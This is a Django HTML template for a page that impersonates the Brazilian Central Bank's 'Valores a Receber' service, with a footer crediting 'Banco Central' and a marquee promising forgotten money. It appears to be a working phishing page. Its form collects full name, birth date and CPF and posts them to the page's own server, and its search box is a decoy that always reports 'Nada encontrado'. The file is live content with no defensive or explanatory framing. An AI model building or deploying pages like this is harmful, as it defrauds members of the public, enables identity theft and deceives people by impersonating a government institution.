{% load static %}

<html>
<head>
  <meta name="viewport" content='width= device-width,user-scalable=no' >
  <meta charset="UTF-8" >
  <title>apoiocentral</title>
  <style>
    body{
      background-image:url("");
      background-size:cover;
      margin:0px;
      
     
    }
    header{
      width:100%;
      max-width:370px;
      height:100px;
      margin:auto;
      margin-top:5px;
      
    }
   nav{
     width:100%;
     max-width:300px;
     height:200px;
     margin:auto;
     
     margin-top:60px;
     
   }
  .a{
    width:100%;
    
    max-width:300px;
    height:80px;
  
   
    
  }
  .b{
    width:100%;
    max-width:250px;
    margin:auto;
    height:100px;
    color:#666;
    margin-top:65px;
    overflow:auto;
  }
  main{
    width:100%;
    max-width:200px;
    margin:auto;
    background-image: url("");
    background-size:cover;
    
    margin-top:40px;
    height:200px;
  }
  input{
    margin-top:15px;
  }
  button{
    margin-left:40px;
  }
  .cc{
    font-size:8px;
    
    width:100%;
    max-width:180px;
    height:10px;
    Text-shadow:10px 10px 10px black;
    margin:auto;
    margin-top:100px;
  }
  .lu{
    width:30px;
    height:30px;
    
    float:left;
    margin-top:10px;
  }
  .lu2{
    float:left;
    
  }
  </style>
</head>
<body>
  <header>
    <img src={% static 'bac.jpeg'%} width="100%" max-width="370px" height="100px"/>
    
  </header>
  
  
  <nav>
    
    <div class="a">
      <div class="lu2"><input typy="text" placeholder="Pesquise" name="paulo"/></div>
      <div class="lu"><img src={% static 'll.png' %} width="30px" height="30px"/></div>
      
    </div>
    
    <div class="b"><marquee direction="up" behavior="slide" scrolldelay="1s" >O Sistema de Valores a Receber (SVR) é um serviço do Banco Central no qual você pode consultar se você, sua empresa ou pessoa falecida tem dinheiro esquecido em algum banco, consórcio ou outra instituição e, caso tenha, saber como solicitar o valor? 👇</marquee></div>
  </nav>
  <main>
    <form action='' method='POST'>
        {% csrf_token %}
      <input type="text" name='nome' placeholder="Nome completo {{o}}"  required/>
       data
      <input type="date" placeholder="data nascimento" name='data' required/>
      
      <input type="text" placeholder="CPF ex:111.222.333-11" name='cpf' required/>
      <br>
      <br>
      <button>Consultar</button>
    </form>
    
    
  </main>
  
  <div class="cc"><strong>@2024 Banco Central @APOIO central</strong></div>
  <script>
   document.querySelector(".lu").addEventListener("click",function(){
      const a = document.querySelector("input").value;
      
      if(a == ""){
        alert("campo vazio.")
      }else{
        alert("Nada encontrado")
      }
   })
  
  </script>
</body>
</html>
